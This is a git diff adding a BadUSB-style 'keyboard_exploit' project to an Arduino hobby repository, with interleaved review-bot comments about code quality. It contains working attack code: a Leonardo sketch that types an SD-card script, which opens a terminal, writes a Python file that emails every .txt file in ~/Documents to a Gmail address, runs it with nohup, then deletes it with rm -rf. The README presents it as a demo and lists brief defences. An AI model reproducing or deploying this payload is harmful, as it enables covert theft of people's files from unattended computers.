diff --git a/.gitignore b/.gitignore index f805e81..018b645 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,5 @@ +\.idea +*.pyc # Object files *.o *.ko diff --git a/README.md b/README.md index 1c1b166..5804db0 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ ### TextMotorCommandsInterpretter Given a string command representing coordonates for X, Y axys, the library transforms -those on percentage of power for a two motor robor/car. +those on percentage of power for a two motor robot/car. For the X (direction) between -50 and 50, and Y (power) between -50 and 50 
@@ -37,4 +37,89 @@ boolean direction motorCommandsInterpretter.getDirection(); // percentLeftMotor will be 0.17 // percentRightMotor will be 0.32 // direction will be true -```` \ No newline at end of file +```` + +# Projects + +## neopixel_ring_gyroscope + +Full turorial here: https://www.instructables.com/id/Gyroscope-Fun-With-Neopixel-Ring/ + +![ifttt.png](https://github.com/danionescu0/arduino/blob/master/projects/neopixel_ring_gyroscope/sketch_bb.png) + +## keyboard_exploit + +In this project i'm using an arduino leonardo to simulate a possible USB attack using HID +(humain interface device). + + +**Important!: You can defend against this kind of attack by:** + +* disabling USB ports + +* locking your computer when your're away + +The arduino leonardo can act like a keyboard and mouse, so the attack will be mounted like this: + +**Components:** +* arduino leonardo +* usb cable +* micro usb card reader +* sd card +* push button +* male-female, female-female jumper cables + +**How will the attack work:** + +1. When the button is pressed, the leonardo will read the sd card using a sd card reader. +A special file containg keys and key combination will be present on the card. +The file name is "hack.txt". + +The file can contain raw text, and it will passed to the keyboard just as it is. + +Also it can contain special commands like "Sleep::" and "Command::". + +A line like: +```` +Sleep::200 +```` +means a sleep of 200 ms + +A line like: +```` +Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t +```` +means left ctrl pressed, left alt pressed, t pressed and all released + +You can check all special keys here: https://www.arduino.cc/en/Reference/KeyboardModifiers + +2. Leonardo will read line by line, and interpret the commands and emulate the keys on the keyboard + +My "hack.py" contains a combination of keys that does the following (for UBUNTU linux): + +a. opens a terminal +b. opens a python file for creation using vi +c. 
writes a python script inside that collects all text files inside of documents home folder + and sends them over to a specified gmail address +d. runs the file in the background +e. deletes the file +f. closes the terminal + +This whole thing runs in a few seconds and doesn't leave traces. + +**To replicate the project:** + +a. assemble the arduino leonardo: +connect the button to digital pin 8, connect the card reader and the usb cable +b. edit the hack.txt file and modify the following lines with email and passwords: +```` +smtp_user = 'sender_email_address' +smtp_pass = 'password' +to_address = 'receiver_email_address' +```` +c. format the sd card using fat16 or fat32 +e. copy the hack.txt file +e. ensure you have a test txt file in the Documents folder on your computer +f. plug the arduiono and press the button + + diff --git a/projects/keyboard_exploit/hack.py b/projects/keyboard_exploit/hack.py new file mode 100644 index 0000000..783d8a3 --- /dev/null +++ b/projects/keyboard_exploit/hack.py 
@@ -0,0 +1,41 @@ +import smtplib +import glob, os +from email.MIMEMultipart import MIMEMultipart +from email.MIMEBase import MIMEBase +from email.MIMEText import MIMEText +from email.Utils import COMMASPACE, formatdate +from email import Encoders + +smtp_user = 'sender_email_addr' +smtp_pass = 'sender_password' +to_address = 'receiver_address' +scan_documents_location = '~/Documents/' +from_address = smtp_user + +subject = body = 'Files from hacked computer' +header = 'To :' + to_address + '\n' + 'From : ' + from_address + '\n' + 'Subject : ' + subject + '\n' + +def sendMail(to, subject, text, files=[]): + msg = MIMEMultipart() + msg['From'] = smtp_user + msg['To'] = COMMASPACE.join(to) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + msg.attach( MIMEText(text) ) + for file in files: + part = MIMEBase('application', "octet-stream") + part.set_payload( open(file,"rb").read() ) + Encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment; filename="%s"' + % os.path.basename(file)) + msg.attach(part) + + server = smtplib.SMTP('smtp.gmail.com:587') + server.ehlo_or_helo_if_needed() + server.starttls() + server.ehlo_or_helo_if_needed() + server.login(smtp_user, smtp_pass) + server.sendmail(smtp_user, to, msg.as_string()) + server.quit() + +sendMail([to_address], subject, body, glob.glob("{0}/*.*txt".format(scan_documents_location))) \ No newline at end of file diff --git a/projects/keyboard_exploit/hack.txt b/projects/keyboard_exploit/hack.txt new file mode 100644 index 0000000..29f8124 --- /dev/null +++ b/projects/keyboard_exploit/hack.txt 
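Review bot: hack.py has no docstring or comment, so a reader has to trace `sendMail` and the final `glob.glob(...)` call to learn that the script attaches the matched files and submits them through `smtp.gmail.com:587` after `starttls()`. I would add a header comment such as `# Demo payload: mails files matched under scan_documents_location via SMTP submission on port 587`, which also names the outbound connection that egress filtering or network monitoring on a workstation would see. `smtp_pass` is a plain string literal, so the same comment should say that the placeholder values stay placeholders in the repository, because anything filled in is stored in clear text wherever the file is copied. Smaller points: `header` is assigned and never used, and `files=[]` is a mutable default that is conventionally written `files=None`.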
@@ -0,0 +1,56 @@ +Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t +Sleep::200 +vi hack.py +Sleep::200 +Command::KEY_INSERT +import smtplib +import glob, os +from email.MIMEMultipart import MIMEMultipart +from email.MIMEBase import MIMEBase +from email.MIMEText import MIMEText +from email.Utils import COMMASPACE, formatdate +from email import Encoders + +smtp_user = 'sender_email_addr' +smtp_pass = 'sender_password' +to_address = 'receiver_address' +scan_documents_location = '~/Documents/' +from_address = smtp_user + +subject = body = 'Files from hacked computer' +header = 'To :' + to_address + '\n' + 'From : ' + from_address + '\n' + 'Subject : ' + subject + '\n' + +def sendMail(to, subject, text, files=[]): + msg = MIMEMultipart() + msg['From'] = smtp_user + msg['To'] = COMMASPACE.join(to) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + msg.attach( MIMEText(text) ) + for file in files: + part = MIMEBase('application', "octet-stream") + part.set_payload( open(file,"rb").read() ) + Encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment; filename="%s"' + % os.path.basename(file)) + msg.attach(part) + + server = smtplib.SMTP('smtp.gmail.com:587') + server.ehlo_or_helo_if_needed() + server.starttls() + server.ehlo_or_helo_if_needed() + server.login(smtp_user, smtp_pass) + server.sendmail(smtp_user, to, msg.as_string()) + server.quit() + +sendMail([to_address], subject, body, glob.glob("{0}/*.*txt".format(scan_documents_location))) +Sleep::50 +Command::KEY_ESC +Sleep::100 +:x +Sleep::200 +nohup python hack.py & +Sleep::500 +rm -rf hack.py +Sleep::200 +Command::KEY_LEFT_ALT,KEY_F4 \ No newline at end of file diff --git a/projects/keyboard_exploit/keyboard_exploit.ino b/projects/keyboard_exploit/keyboard_exploit.ino new file mode 100644 index 0000000..163b61f --- /dev/null +++ b/projects/keyboard_exploit/keyboard_exploit.ino 
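Review bot: The sequence from `Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t` to `nohup python hack.py &` opens a visible terminal, types into a shell and starts a background `python` process, so the README sentence added in this commit, "doesn't leave traces", is not supported by what this file does. I would reword that sentence to `This whole thing runs in a few seconds; the terminal, the background process and the outbound mail connection are observable while it runs.` The Python lines between `Command::KEY_INSERT` and `Sleep::50` repeat hack.py verbatim, and since this format has no comment syntax (every line is either a directive or typed text), the README should state which of the two copies is the one to edit. The README step that fills in `smtp_user` and `smtp_pass` in this file also means the SD card holds that credential in clear text.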
@@ -0,0 +1,131 @@ +#include "Keyboard.h" +#include +#include + +String filenameOnCard = "hack.txt"; +String sleepCommandStartingPoint = "Sleep::"; +String commandStartingPoint = "Command::"; +int delayBetweenCommands = 10; +const int buttonPin = 8; +const int chipSelect = 10; +int previousButtonState = HIGH; + +void setup() { + pinMode(buttonPin, INPUT); + Serial.begin(9600); + Keyboard.begin(); + if (!SD.begin(chipSelect)) { + Serial.println("Card failed, or not present!"); + return; + } +} + +void loop() { + int buttonState = digitalRead(buttonPin); + if ((buttonState != previousButtonState) && (buttonState == HIGH)) { + sdFileToKeyboard(); + Serial.println("Uploaded!"); + delay(500); + } + previousButtonState = buttonState; +} + +void sdFileToKeyboard() { + File dataFile = SD.open(filenameOnCard); + if (!dataFile) { + Serial.println("The specified filename is not present on SD card, check filenameOnCard !"); + } + String line; + while (dataFile.available()) { + line = dataFile.readStringUntil('\n'); + Serial.println(line); + sendToKeyboard(line); + } + dataFile.close(); +} + +void sendToKeyboard(String line) { + String workingLine = line; + if (workingLine.indexOf(sleepCommandStartingPoint) != -1) { + sleepFor(line); + return; + } + if (workingLine.indexOf(commandStartingPoint) == -1) { + Serial.print("Text:");Serial.println(line); + Keyboard.println(line); + pressEnter(); + return; + } + + Serial.println("Command:"); + int charPosition = commandStartingPoint.length(); + int lineLength = line.length(); + workingLine += ","; + + while (workingLine != "") { + workingLine = workingLine.substring(charPosition); + Serial.print("WorkingLine:");Serial.println(workingLine); + int specialCommandDelimiterPosition = workingLine.indexOf(","); + String command = workingLine.substring(0, specialCommandDelimiterPosition); + charPosition = specialCommandDelimiterPosition + 1; + if (command != "") { + Serial.print("Command found:");Serial.println(command); + 
Keyboard.press(getCommandCode(command)); + delay(delayBetweenCommands); + } + } + Keyboard.releaseAll(); + delay(delayBetweenCommands); +} + +void pressEnter() { + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +void sleepFor(String line) { + int sleepAmount = line.substring(sleepCommandStartingPoint.length(), line.length()).toInt(); + Serial.print("Sleeping for:");Serial.println(sleepAmount); + delay(sleepAmount); +} + +char getCommandCode(String text) { + char textCharacters[2]; + text.toCharArray(textCharacters, 2); + char code = textCharacters[0]; + + code = (text == "KEY_LEFT_CTRL") ? KEY_LEFT_CTRL : code; + code = (text == "KEY_LEFT_SHIFT") ? KEY_LEFT_SHIFT : code; + code = (text == "KEY_LEFT_ALT") ? KEY_LEFT_ALT : code; + code = (text == "KEY_UP_ARROW") ? KEY_UP_ARROW : code; + code = (text == "KEY_DOWN_ARROW") ? KEY_DOWN_ARROW : code; + code = (text == "KEY_LEFT_ARROW") ? KEY_LEFT_ARROW : code; + code = (text == "KEY_RIGHT_ARROW") ? KEY_RIGHT_ARROW : code; + code = (text == "KEY_RIGHT_GUI") ? KEY_RIGHT_GUI : code; + code = (text == "KEY_BACKSPACE") ? KEY_BACKSPACE : code; + code = (text == "KEY_TAB") ? KEY_TAB : code; + code = (text == "KEY_RETURN") ? KEY_RETURN : code; + code = (text == "KEY_ESC") ? KEY_ESC : code; + code = (text == "KEY_INSERT") ? KEY_INSERT : code; + code = (text == "KEY_DELETE") ? KEY_DELETE : code; + code = (text == "KEY_PAGE_UP") ? KEY_PAGE_UP : code; + code = (text == "KEY_PAGE_DOWN") ? KEY_PAGE_DOWN : code; + code = (text == "KEY_HOME") ? KEY_HOME : code; + code = (text == "KEY_END") ? KEY_END : code; + code = (text == "KEY_CAPS_LOCK") ? KEY_CAPS_LOCK : code; + code = (text == "KEY_F1") ? KEY_F1 : code; + code = (text == "KEY_F2") ? KEY_F2 : code; + code = (text == "KEY_F3") ? KEY_F3 : code; + code = (text == "KEY_F4") ? KEY_F4 : code; + code = (text == "KEY_F5") ? KEY_F5 : code; + code = (text == "KEY_F6") ? KEY_F6 : code; + code = (text == "KEY_F7") ? KEY_F7 : code; + code = (text == "KEY_F8") ? 
KEY_F8 : code; + code = (text == "KEY_F9") ? KEY_F9 : code; + code = (text == "KEY_F10") ? KEY_F10 : code; + code = (text == "KEY_F11") ? KEY_F1 : code; + code = (text == "KEY_F12") ? KEY_F2 : code; + + return code; +} + diff --git a/projects/neopixel_ring_gyroscope/sketch.fzz b/projects/neopixel_ring_gyroscope/sketch.fzz new file mode 100644 index 0000000..f1d5a78 Binary files /dev/null and b/projects/neopixel_ring_gyroscope/sketch.fzz differ diff --git a/projects/neopixel_ring_gyroscope/sketch_bb.png b/projects/neopixel_ring_gyroscope/sketch_bb.png new file mode 100644 index 0000000..3a7a026 Binary files /dev/null and b/projects/neopixel_ring_gyroscope/sketch_bb.png differ
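Review bot: In `sdFileToKeyboard` the `if (!dataFile)` branch only prints a message and then falls through to the read loop and `dataFile.close()`; it should end with `return;`, and `loop()` prints `Uploaded!` whether or not the file was opened. `setup()` has the same shape: it returns when `SD.begin(chipSelect)` fails, but `loop()` still reacts to the button afterwards, so the failure is only visible on the serial console. In `getCommandCode` the last two rows look like copy-paste slips, mapping `"KEY_F11"` to `KEY_F1` and `"KEY_F12"` to `KEY_F2`; they should read `code = (text == "KEY_F11") ? KEY_F11 : code;` and the same for `KEY_F12`. `lineLength` in `sendToKeyboard` is assigned and never used.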